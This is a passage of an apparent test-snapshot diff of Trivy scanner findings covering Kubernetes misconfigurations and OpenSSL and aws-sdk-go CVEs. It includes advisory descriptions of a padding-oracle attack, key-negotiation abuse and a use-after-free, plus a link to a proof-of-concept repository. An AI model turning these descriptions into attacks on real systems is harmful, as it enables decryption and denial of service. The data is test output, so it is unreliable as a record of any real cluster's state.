}, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(DaemonSet 'kindnet' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ConfigMap/extension-apiserver-authentication' / Class: 'config' / Type: 'kubernetes'", - "id": "AVD-KSV-0110", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://avd.aquasec.com/misconfig/avd-ksv-0110", - ], - }, - "category": "Misconfiguration", - "description": "Storing sensitive content such as usernames and email addresses in configMaps is unsafe", - "location": "scb://trivy/?Namespace=kube-system&Kind=ConfigMap&Name=extension-apiserver-authentication", - "mitigation": "Remove sensitive content from configMap data value", - "name": "ConfigMap with sensitive content(ConfigMap 'extension-apiserver-authentication' in 'kube-system' namespace stores sensitive contents in key(s) or value(s) '{"requestheader-username-headers"}')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/avd-ksv-0110", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "3.1.1-r0", - "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2023-2650", - "installedVersion": "3.1.0-r4", - "packageName": "libcrypto3", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.1.1-r0", - "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2023-2650", - "installedVersion": "3.1.0-r4", - "packageName": "libssl3", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. +The OpenSSL cms and smime command line applications are similarly affected. -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", +" +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8911", - "installedVersion": "v1.44.245", - "packageName": "github.com/aws/aws-sdk-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8911", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", - "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8911", - ], - }, - "category": "Vulnerability", - "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": undefined, - "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8912", - "installedVersion": "v1.44.245", - "packageName": "github.com/aws/aws-sdk-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8912", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", - "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8912", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": undefined, - "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8912", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8912", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - 